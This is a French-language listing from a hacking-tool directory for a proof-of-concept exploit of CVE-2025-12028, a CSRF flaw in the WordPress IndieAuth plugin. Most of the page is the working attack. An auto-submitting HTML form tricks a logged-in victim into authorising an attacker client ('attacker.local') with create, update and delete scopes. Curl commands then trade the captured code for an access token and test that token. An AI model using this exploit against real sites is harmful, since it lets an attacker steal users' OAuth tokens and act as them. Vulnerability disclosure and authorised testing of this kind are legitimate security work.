Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-12028 — Preuve de concept de l'exploit pour CVE-2025-12028 démontrant le vol de jetons OAuth basé sur CSRF dans le plugin WordPress IndieAuth, permettant un accès non autorisé à l'API avec des identifiants volés. | Kitploit
Outils/GitHubGitHub/jfriedli/cve-2025-12028
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentification
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

Preuve de concept de l'exploit pour CVE-2025-12028 démontrant le vol de jetons OAuth basé sur CSRF dans le plugin WordPress IndieAuth, permettant un accès non autorisé à l'API avec des identifiants volés.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

1) Démarrer un serveur HTTP simple pour héberger la page de preuve de concept

root@kitploit:~
mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) Créer un fichier /tmp/attacker/poc.html avec le contenu suivant

root@kitploit:~
<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) Déclencher la PoC dans une session de navigateur connectée

Tout en étant connecté à :

root@kitploit:~
http://localhost/wordpress

Ouvrir :

root@kitploit:~
http://127.0.0.1:8000/poc.html

dans la même session de navigateur.


4) Observer la redirection d'autorisation

Le navigateur va :

  • Effectuer une POST vers le point de terminaison IndieAuth avec les cookies de la victime
  • Recevoir un code d'autorisation
  • Rediriger vers :
root@kitploit:~
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) Échanger le code contre un jeton d'accès

root@kitploit:~
curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) Observer la réponse du jeton

La réponse JSON contiendra des champs tels que :

  • access_token
  • scope
  • me
  • (éventuellement) refresh_token

Ce jeton peut maintenant être utilisé pour agir en tant que victime dans le cadre des autorisations accordées.


7) Vérifier le jeton

root@kitploit:~
TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
Télécharger l’outil